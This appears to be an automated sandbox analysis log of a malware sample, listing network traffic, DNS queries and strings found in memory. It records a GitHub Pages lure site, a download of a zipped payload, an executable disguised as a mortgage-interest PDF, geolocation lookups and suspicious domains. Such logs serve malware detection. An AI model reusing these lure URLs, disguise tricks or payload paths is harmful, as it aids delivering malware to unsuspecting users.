Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/9m1ve/0x4AAAAAAAktEy218PeM5fmO/auto/fbE/normal/auto/ HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://maveuve.github.io/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8c8c7bc1cab943c1&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/9m1ve/0x4AAAAAAAktEy218PeM5fmO/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8c8c7bc1cab943c1&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/784762221:1727280895:DpZwutPQnAJ2xMIFwpiobNTMBlYJp9CWXlp9V5GN5Yo/8c8c7bc1cab943c1/4904f693d598ee1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/pat/8c8c7bc1cab943c1/1727282716834/454bfa27911b53eaf89b77fb676ac9ea7d67d7c4009c0340595e1039d45fc476/ANn6E4_AEvWbw_F HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/9m1ve/0x4AAAAAAAktEy218PeM5fmO/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=E7m3O887TFWMntR&MD=kMUKRooF HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/i/8c8c7bc1cab943c1/1727282716836/wNiz968zyhOEG8- HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/9m1ve/0x4AAAAAAAktEy218PeM5fmO/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/i/8c8c7bc1cab943c1/1727282716836/wNiz968zyhOEG8- HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/784762221:1727280895:DpZwutPQnAJ2xMIFwpiobNTMBlYJp9CWXlp9V5GN5Yo/8c8c7bc1cab943c1/4904f693d598ee1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/784762221:1727280895:DpZwutPQnAJ2xMIFwpiobNTMBlYJp9CWXlp9V5GN5Yo/8c8c7bc1cab943c1/4904f693d598ee1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /maveuve/vbdsz/raw/refs/heads/main/Marys%20Organizer%202023%20Release.zip HTTP/1.1Host: github.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://maveuve.github.io/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /maveuve/vbdsz/refs/heads/main/Marys%20Organizer%202023%20Release.zip HTTP/1.1Host: raw.githubusercontent.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Referer: https://maveuve.github.io/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache

Source: global traffic	DNS traffic detected: DNS query: maveuve.github.io
Source: global traffic	DNS traffic detected: DNS query: challenges.cloudflare.com
Source: global traffic	DNS traffic detected: DNS query: stackpath.bootstrapcdn.com
Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: github.com
Source: global traffic	DNS traffic detected: DNS query: raw.githubusercontent.com
Source: global traffic	DNS traffic detected: DNS query: privmerkt.com
Source: global traffic	DNS traffic detected: DNS query: geoplugin.net
Source: global traffic	DNS traffic detected: DNS query: nwemarkets.com

Source: unknown

HTTP traffic detected: POST /cdn-cgi/challenge-platform/h/g/flow/ov1/621320543:1727280800:x-uSLD9blvM2sN0MY5eDk1KX-nemuunHuqvoVAWU97E/8c8c7ad8c96941a6/596e5d08887dcbd HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveContent-Length: 2740sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Content-type: application/x-www-form-urlencodedsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36CF-Challenge: 596e5d08887dcbdsec-ch-ua-platform: "Windows"Accept: */*Origin: https://challenges.cloudflare.comSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/5renj/0x4AAAAAAAktEy218PeM5fmO/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closeContent-Length: 9115Server: GitHub.comContent-Type: text/html; charset=utf-8permissions-policy: interest-cohort=()ETag: "66f42b03-239b"Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; img-src data:; connect-src 'self'X-GitHub-Request-Id: B0A8:16FC:DF5CDC:F64E2A:66F43DF5Accept-Ranges: bytesAge: 0Date: Wed, 25 Sep 2024 16:44:37 GMTVia: 1.1 varnishX-Served-By: cache-nyc-kteb1890089-NYCX-Cache: MISSX-Cache-Hits: 0X-Timer: S1727282678.712256,VS0,VE12Vary: Accept-EncodingX-Fastly-Request-ID: 4df56139da6771a9ee33d896ba1a2d7a1a250114
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 16:44:39 GMTContent-Type: application/jsonContent-Length: 7Connection: closecf-chl-out: 4IA3++4DQo/dQ/6htSqdo4nGtJCiIc21iik=$q2ffHhGJNXwllPmocache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Server: cloudflareCF-RAY: 8c8c7ae99f0d183d-EWR
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 16:44:42 GMTContent-Type: application/jsonContent-Length: 7Connection: closecf-chl-out: nY4+DH6ZBhG0Oqj/RFG0xMF8vFh5uwTGybA=$alOBOjM7O2DWM6MXcache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Server: cloudflareCF-RAY: 8c8c7afcbc4542b9-EWR
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 16:44:44 GMTContent-Type: application/jsonContent-Length: 7Connection: closecache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0cf-chl-out: yzYdkmFQqIKp4n/d8ojQnwwKrZsIgtD8TRU=$KqvhZj5kqJ9sfX1RServer: cloudflareCF-RAY: 8c8c7b098cfe0f63-EWR
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 16:45:18 GMTContent-Type: application/jsonContent-Length: 7Connection: closecache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0cf-chl-out: heThQ+4lTs7dNvOM9rk0oj2vvmHsAKe1d7U=$Ig+HqhGhMfGlFPmoServer: cloudflareCF-RAY: 8c8c7bdecf9a17f1-EWR
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 16:45:21 GMTContent-Type: application/jsonContent-Length: 7Connection: closecache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0cf-chl-out: cf//PbHEE7HjoGAaztXMbRYI2394GGHDrkU=$oTsqUDjJCW31GfGkServer: cloudflareCF-RAY: 8c8c7bf23c7b4402-EWR
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 16:45:23 GMTContent-Type: application/jsonContent-Length: 7Connection: closecache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0cf-chl-out: hiLtZWxjvfA5cR90Xv1b2YnN3f6C1ASxQe8=$bT7Mq3YK+vpHIjc+Server: cloudflareCF-RAY: 8c8c7bff2f2a19aa-EWR

Source: MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 00000009.00000000.2148958453.00000000006C9000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: http://HDMHDMLoading...%s
Source: MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 00000009.00000000.2148958453.00000000006C9000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: http://blog.kowalczyk.info/software/sumatrapdf/translations.htmlContribute
Source: MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 00000009.00000000.2148958453.00000000006C9000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: http://blog.kowalczyk.info/software/sumatrapdf/translators.htmlThe
Source: MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 00000009.00000000.2148958453.00000000006C9000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: http://blog.kowalczyk.infoKrzysztof
Source: MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 00000009.00000000.2148958453.00000000006C9000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: http://cn.haihaisoft.com/%E6%B5%B7%E6%B5%B7%E8%BD%AF%E4%BB%B6PDF%E9%98%85%E8%AF%BB%E5%99%A8.aspxopen
Source: MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 00000009.00000000.2148958453.00000000006C9000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: http://cn.haihaisoft.comhttp://www.haihaisoft.comcnhttp://cn.haihaisoft.com/%E6%B5%B7%E6%B5%B7%E8%BD
Source: MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000002.2563583207.0000000000DA8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geoplugin.net/
Source: MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2313438225.0000000000DE7000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2331062452.0000000000DDC000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2313438225.0000000000E0C000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000002.2563583207.0000000000DF6000.00000004.00000020.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000002.2563583207.0000000000E11000.00000004.00000020.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2331062452.0000000000E11000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2340389898.0000000000DE7000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2331062452.0000000000E05000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://geoplugin.net/json.gp
Source: MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 00000009.00000002.2324228645.0000000010163000.00000040.00000001.01000000.00000005.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 00000009.00000002.2323301889.0000000002850000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: http://geoplugin.net/json.gp/C
Source: MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2313438225.0000000000DE7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://geoplugin.net/json.gpT
Source: MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2331062452.0000000000DF6000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2313438225.0000000000DE7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://geoplugin.net/json.gpV
Source: MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2331062452.0000000000DF6000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2313438225.0000000000DE7000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000002.2563583207.0000000000DF6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geoplugin.net/json.gpn
Source: MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 00000009.00000000.2148958453.00000000006C9000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: http://itexmac.sourceforge.net/SyncTeX.htmlJ
Source: MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 00000009.00000000.2148958453.00000000006C9000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: http://mailto:EmbeddedFilesTypeFilespecD%s%dR%s%sA%s%sKids.seen.seen.seenNumsSPStD%s.%d:%d:%dInfoPag
Source: MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 00000009.00000000.2148958453.00000000006C9000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: http://mupdf.comMuPDFpdf
Source: MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 00000009.00000000.2148958453.00000000006C9000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: http://p.yusukekamiyamane.com/Yusuke
Source: MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 00000009.00000000.2148958453.00000000006C9000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: http://william.famille-blum.org/William
Source: MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 00000009.00000000.2148958453.00000000006C9000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 00000009.00000000.2148958453.00000000006C9000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0Digitized
Source: MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 00000009.00000000.2148958453.00000000006C9000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: http://www.ascendercorp.com/http://www.ascendercorp.com/typedesigners.htmlLicensed
Source: MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 00000009.00000000.2148958453.00000000006C9000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: http://www.drm-x.com/pdfversion.htm1.5.7.0..http://www.haihaisoft.com/PDF_Reader_download.aspxopenSo
Source: MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 00000009.00000000.2148958453.00000000006C9000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: http://www.drm-x.net/http://cn.drm-x.com/LicPrepare2008.aspxLicPrepare20082013.aspx.drm-x.com/2/%s?c
Source: MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 00000009.00000000.2148958453.00000000006C9000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: http://www.flashvidz.tk/Zenonprogram
Source: MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 00000009.00000000.2148958453.00000000006C9000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: http://www.freetype.org/FreeTypefont
Source: MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 00000009.00000000.2148958453.00000000006C9000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: http://www.haihaisoft.com/Contact.aspx
Source: MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 00000009.00000000.2148958453.00000000006C9000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: http://www.haihaisoft.com/Contact.aspx%u%?.Install_DirSoftware
Source: MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 00000009.00000000.2148958453.00000000006C9000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: http://www.haihaisoft.com/PDF_Reader_download.aspxhttp://www.drm-x.com/pdfversion.htmMS
Source: MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 00000009.00000000.2148958453.00000000006C9000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: http://www.haihaisoft.comSumatraPDF
Source: MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 00000009.00000000.2148958453.00000000006C9000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: http://www.haihaisoft.comlibmupdf.pdbSumatraPDF.pdbSumatraPDF-prereleaseSumatraPDF.pdbSumatraPDF-1.5
Source: MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 00000009.00000002.2324907056.0000000010375000.00000004.00001000.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 00000009.00000002.2323953234.0000000010119000.00000002.00000001.01000000.00000005.sdmp	String found in binary or memory: http://www.openssl.org/support/faq.html
Source: MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 00000009.00000002.2324907056.0000000010375000.00000004.00001000.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 00000009.00000002.2323953234.0000000010119000.00000002.00000001.01000000.00000005.sdmp	String found in binary or memory: http://www.openssl.org/support/faq.html....................
Source: build.exe, 00000013.00000000.2438293164.000000000061E000.00000002.00000001.01000000.00000007.sdmp	String found in binary or memory: http://www.symantec.com/XMLSchema/dcs/disc-protection
Source: MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2415952110.00000000041B9000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2426201068.0000000004B48000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2418692627.0000000003F60000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2422479886.0000000004F3D000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000013.00000000.2438293164.000000000061E000.00000002.00000001.01000000.00000007.sdmp	String found in binary or memory: http://www.symantec.com/XMLSchema/dcs/disc-results
Source: MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 00000009.00000000.2148958453.00000000006C9000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: http://www.winimage.com/zLibDll
Source: MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 00000009.00000000.2148958453.00000000006C9000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: http://www.winimage.com/zLibDllbad
Source: MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 00000009.00000000.2148958453.00000000006C9000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: http://www.zeniko.ch/#SumatraPDFSimon
Source: chromecache_75.1.dr	String found in binary or memory: https://getbootstrap.com/)
Source: chromecache_75.1.dr	String found in binary or memory: https://github.com/twbs/bootstrap/blob/master/LICENSE)
Source: chromecache_74.1.dr	String found in binary or memory: https://githubstatus.com
Source: chromecache_74.1.dr	String found in binary or memory: https://help.github.com/pages/
Source: chromecache_74.1.dr	String found in binary or memory: https://twitter.com/githubstatus

Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49723
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 49678 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49758
